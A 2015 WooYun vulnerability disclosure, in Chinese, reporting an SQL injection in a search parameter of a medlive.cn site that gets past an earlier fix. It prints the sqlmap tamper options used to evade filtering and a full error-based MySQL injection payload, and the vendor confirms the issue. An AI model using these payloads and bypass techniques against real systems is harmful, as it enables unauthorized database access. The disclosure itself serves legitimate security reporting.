当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115873

漏洞标题:医脉通某站存在SQL注入之八(已经修复再绕过注入)

相关厂商:medlive.cn

漏洞作者: Ch4r0n

提交时间:2015-05-25 17:59

修复时间:2015-07-11 11:24

公开时间:2015-07-11 11:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-25: 细节已通知厂商并且等待厂商处理中
2015-05-27: 厂商已经确认,细节仅向厂商公开
2015-06-06: 细节向核心白帽子及相关领域专家公开
2015-06-16: 细节向普通白帽子公开
2015-06-26: 细节向实习白帽子公开
2015-07-11: 细节向公众公开

简要描述:

之前测试过,返回应该是空白的信息,但是这次直接返回错误,而且被过滤了一些字符,要绕过才行!~~~

详细说明:

地址

http://diy.medlive.cn/?file=diy&action=manage


测试12'
返回错误信息,估计存在注入(这个应是被修复了,因为之前没有修复前,返回的是空白,现在返回错误)

test1.jpg


test2-1.jpg


之前返回空白

test2.jpg


抓包在burpsuite上测试
加'和没有加返回结果

test3.jpg


test4.jpg


上神器sqlmap,如果只是简单的 -r 地址 --dbms这些的话,是无法注入的,那么只能绕过,添加一些参数测试吧,这里不知道添加那个参数合适,那就几个都上吧

--threads 10 --dbms "MySQL" --level 5 --tamper  between.py,space2comment.py,randomcase.py,_space20a.py --risk 2 -psearch_text


1.jpg


2.jpg


3.jpg


4.jpg


5.jpg


PS:修复前的测试,因已经提交过,就没有提交了,从这次绕过来看,反而比修复前获取数据更快

Place: POST
Parameter: search_text
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: search_text=12' AND (SELECT 4913 FROM(SELECT COUNT(*),CONCAT(0x7178746f71,(SELECT (CASE WHEN (4913=4913) THEN 1 ELSE 0 END)),0x7176617071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'uwLT'='uwLT&type=new
---
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0


漏洞证明:

4.jpg


5.jpg

修复方案:

你们懂得如何修复!~~~

版权声明:转载请注明来源 Ch4r0n@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-27 11:22

厂商回复:

谢谢,我们正在紧急修复中。。

最新状态:

暂无